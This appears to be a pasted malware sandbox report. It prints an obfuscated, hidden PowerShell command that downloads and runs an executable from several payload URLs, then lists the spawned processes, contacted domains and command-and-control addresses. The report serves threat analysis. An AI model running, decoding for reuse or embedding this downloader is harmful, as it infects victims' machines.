- Powershell -w hidden -en JABHAG0AdAB0AHMAcABkAGQAaQBwAGEAawA9ACcARABnAHYAYwBmAG4AcQB5ACcAOwAkAFQAdABsAHMAcQBnAGIAdAB3AGwAdwBrAGYAIAA9ACAAJwAyADUAJwA7ACQAQgB0AGoAdAB6AG4AdQBrAHgAbQBpAGYAPQAnAEcAcABxAGQAZABxAHYAawBxACcAOwAkAFYAeABhAHEAcQB0AHYAegBtAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABUAHQAbABzAHEAZwBiAHQAdwBsAHcAawBmACsAJwAuAGUAeABlACcAOwAkAEEAaABhAHMAYwBpAGwAcQBiAD0AJwBUAGoAaQBiAGcAYQBzAHEAdQBiAGMAdwB6ACcAOwAkAEUAcQBnAGkAbwB1AHIAZABtAGgAbQA9AC4AKAAnAG4AZQB3AC0AJwArACcAbwAnACsAJwBiAGoAJwArACcAZQBjAHQAJwApACAAbgBFAFQALgB3AEUAYgBjAEwASQBFAE4AVAA7ACQARQBuAHIAdgBjAGoAaQBlAG0AYQBhAD0AJwBoAHQAdABwADoALwAvAHcAaQBuAGcAcwBpAG4AZwByAGUAZQBuAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB1AGoAcwA0ADIANwAvACoAaAB0AHQAcAA6AC8ALwBuAGEAawBoAGwAbQBhAHIAawBlAHQALgBjAG8AbQAvAGIAaABiAGwALwA3ADEAOAA3ADIANwAvACoAaAB0AHQAcABzADoALwAvAGoAbwBzAGUAcwBtAGUAeABpAGMAYQBuAGYAbwBvAGQAaQBuAGMALgBjAG8AbQAvAGkAbgBxAHUAaQByAGUALwBvADQAMQA1ADcANwAzAC8AKgBoAHQAdABwADoALwAvAHMAdABvAG4AZQBhAHIAeQBhAG4ALgBjAG8AbQAvAGYAbABhAHMAaABjAGgAYQB0AC8AMABjAG4AcwBiADMAMQAvACoAaAB0AHQAcABzADoALwAvAG0AdQBzAHQAYQBrAGgAYQBsAGYALgBjAG8AbQAvAGEANQBsAGcAaQAvAGgANQA4AGEANgB1ADAANAAzADUALwAnAC4AIgBzAFAAYABMAEkAVAAiACgAJwAqACcAKQA7ACQAVgB4AG4AdgByAGQAcQBvAD0AJwBVAHIAdQBlAHgAcAByAHAAbAAnADsAZgBvAHIAZQBhAGMAaAAoACQAWQBnAGgAYwBjAGcAawBrAHMAdAB5AGMAbQAgAGkAbgAgACQARQBuAHIAdgBjAGoAaQBlAG0AYQBhACkAewB0AHIAeQB7ACQARQBxAGcAaQBvAHUAcgBkAG0AaABtAC4AIgBkAE8AdwBOAGAATABgAG8AYQBEAGYAaQBsAGUAIgAoACQAWQBnAGgAYwBjAGcAawBrAHMAdAB5AGMAbQAsACAAJABWAHgAYQBxAHEAdAB2AHoAbQApADsAJABVAGIAagB2AHIAYQB6AGQAeQA9ACcAVgBiAG4AbwBkAGYAegBzACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAVgB4AGEAcQBxAHQAdgB6AG0AKQAuACIAbABFAE4AYABHAFQAaAAiACAALQBnAGUAIAAyADIANQAxADAAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBUAEEAYABSAHQAIgAoACQAVgB4AGEAcQBxAHQAdgB6AG0AKQA7ACQAVgBtAGkAeABsAHcAbABrAGcAbgA9ACcAQQB2AGQAYQB6AGMAcgBsAHoAdgB0AHcAJwA7AGIAcgBlAGEAawA7ACQASQBsAG0AcQBzAHQAbABsAGcAeABuAHQAPQAnAFIAbwBlAG4AdQBoAG0AdAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABBAHAAbABqAGoAegB0AG0AZQA9ACcAWgB4AHEAdgBpAGkAbwBwAGYAbgBmACcA
- PID: 4856
- C:\Users\Admin\25.exe
- "C:\Users\Admin\25.exe"
- PID: 724
- C:\Users\Admin\25.exe
- --6dd7abed
- PID: 5116
- C:\Windows\SysWOW64\acquiretexas.exe
- "C:\Windows\SysWOW64\acquiretexas.exe"
- PID: 4260
- C:\Windows\SysWOW64\acquiretexas.exe
- --b26667d5
- PID: 4228
- 89.46.106.62:443
- suncityefficiencytour.it
- IEXPLORE.EXE
- 89.46.106.62:443
- suncityefficiencytour.it
- IEXPLORE.EXE
- 93.184.221.240:80
- ctldl.windowsupdate.com
- IEXPLORE.EXE
- 93.184.221.240:80
- ctldl.windowsupdate.com
- IEXPLORE.EXE
- GET
- 200
- 109.70.240.130:80
- http://ocsp05.actalis.it/VA/AUTH-ROOT/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSw4x5v4bTlizjNRmTdkYSy7q0R9gQUUtiIOsifeGbtifN7OHCUyQICNtACEG6Ji2gdsJH8UzyM1j%2FYAOc%3D
- IEXPLORE.EXE
- GET
- 200
- 109.70.240.114:80
- http://ocsp09.actalis.it/VA/AUTHOV-G2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSH7LRwIYxAK55PTYjOJla%2FvWNK5gQUYv67J4pkRO1ollpYeaHbWiat%2F7sCEHDEl1QqtH3UxmUO1AJEGkU%3D
- IEXPLORE.EXE
- GET
- 200
- 109.70.240.114:80
- http://crl09.actalis.it/Repository/AUTHOV-G2/getLastCRL
- IEXPLORE.EXE
- 89.46.106.62:443
- suncityefficiencytour.it
- IEXPLORE.EXE
- 89.46.106.62:443
- suncityefficiencytour.it
- IEXPLORE.EXE
- GET
- 200
- 89.46.106.62:80
- http://www.suncityefficiencytour.it/OLD-HACKED/private-module/security-088ff6mv1qh28x-620/HSzq4G-c7jn8uocnmct/
- IEXPLORE.EXE
- 117.18.232.200:443
- iecvlist.microsoft.com
- iexplore.exe
- 93.184.220.29:80
- ocsp.digicert.com
- iexplore.exe
- 117.18.232.200:443
- iecvlist.microsoft.com
- 52.109.76.6:443
- officeclient.microsoft.com
- 52.109.88.40:443
- nexus.officeapps.live.com
- 52.109.88.36:443
- nexusrules.officeapps.live.com
- 103.21.58.201:80
- wingsingreen.com
- Powershell.exe
- GET
- 302
- 5.61.24.202:80
- http://nakhlmarket.com/bhbl/718727/
- Powershell.exe
- 185.225.236.136:443
- josesmexicanfoodinc.com
- Powershell.exe
- 171.22.26.31:80
- stonearyan.com
- Powershell.exe
- 54.36.221.251:443
- mustakhalf.com
- Powershell.exe
- 204.79.197.200:443
- ieonline.microsoft.com
- iexplore.exe
- 204.79.197.200:443
- ieonline.microsoft.com
- iexplore.exe
- 127.0.0.1:47001
- 93.184.221.240:80
- ctldl.windowsupdate.com
- 104.81.140.70:443
- fs.microsoft.com
- 68.187.160.28:443
- acquiretexas.exe
- 104.81.140.70:443
- fs.microsoft.com
- 104.81.140.70:443
- fs.microsoft.com
- 104.81.140.70:443
- fs.microsoft.com
- 52.109.76.6:443
- officeclient.microsoft.com
- WINWORD.EXE
- 52.109.88.40:443
- nexus.officeapps.live.com
- 52.109.88.36:443
- nexusrules.officeapps.live.com
- 97.120.32.227:80
- acquiretexas.exe
- 187.188.166.192:8080
- acquiretexas.exe
Add Comment
Please, Sign In to add comment